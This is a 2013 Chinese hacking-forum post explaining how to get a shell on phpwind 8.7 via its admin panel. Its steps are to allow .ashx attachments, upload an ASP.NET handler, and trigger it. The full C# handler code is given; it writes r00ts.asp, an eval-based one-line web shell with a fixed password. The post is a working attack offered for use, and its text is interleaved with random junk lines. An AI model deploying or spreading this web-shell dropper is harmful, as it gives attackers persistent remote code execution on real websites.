中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
- H$ Y# F, b4 j8 e8 F+ a
+ k+ T' K- i; E
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
1 a! n. \: ^/ D. T
/ l; x$ F* N' a* C. y; H
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
3 `( M: r, U- T3 x. @' u& e
# h! j( w+ ] i+ i8 Z; a5 {
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
% `0 k6 X; Z/ R' p9 f/ `
" ~ |( ?4 S5 x K t
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
/ V8 t6 t5 z: a! z3 I) E0 c
j+ G) _! ?3 X- g, ]- V
下面是代码:
% P" E0 a- r/ j2 O
v K3 S8 Q9 |) o) q- m
<%@ WebHandler Language="C#"Class="Handler" %>
, p( B+ Q5 i) \/ R/ A1 U4 B8 ^
using System;
2 U! P6 @4 {: e! \. y0 H
using System.Web;
5 e! E/ S$ l. ~% o8 I
using System.IO;
$ s+ x+ }1 v# s( W% I
public class Handler : IHttpHandler {
8 Q4 S" B( \) J1 V
public void ProcessRequest (HttpContext context) {
/ H, W0 A# s: |
context.Response.ContentType = "text/plain";
4 m7 o8 Z* F u; v, k- E1 x9 h& @
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
2 F0 w2 l0 y% P! T
file1.Write("<%eval request(\"r00ts\")%>");
% C( k+ C0 F/ E1 Q# x
file1.Flush();
+ ]1 k) d/ R$ O2 V2 p- |
file1.Close();
; C& }5 T0 X$ }* F: A2 E
}
! g2 W, f5 X& ^6 G2 b, d) s" n
public bool IsReusable {
& {3 r; s4 c) x+ B4 \
get {
# {" u0 U: K% B, R" P4 p* a8 x
return false;
4 Z. X' t/ V* R) p
}
$ }/ Q7 h0 g% `" `6 z" o
}
( k+ N4 T- p. m+ d9 }9 ?$ N! Q
}
0 B- E# m6 [3 E4 n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2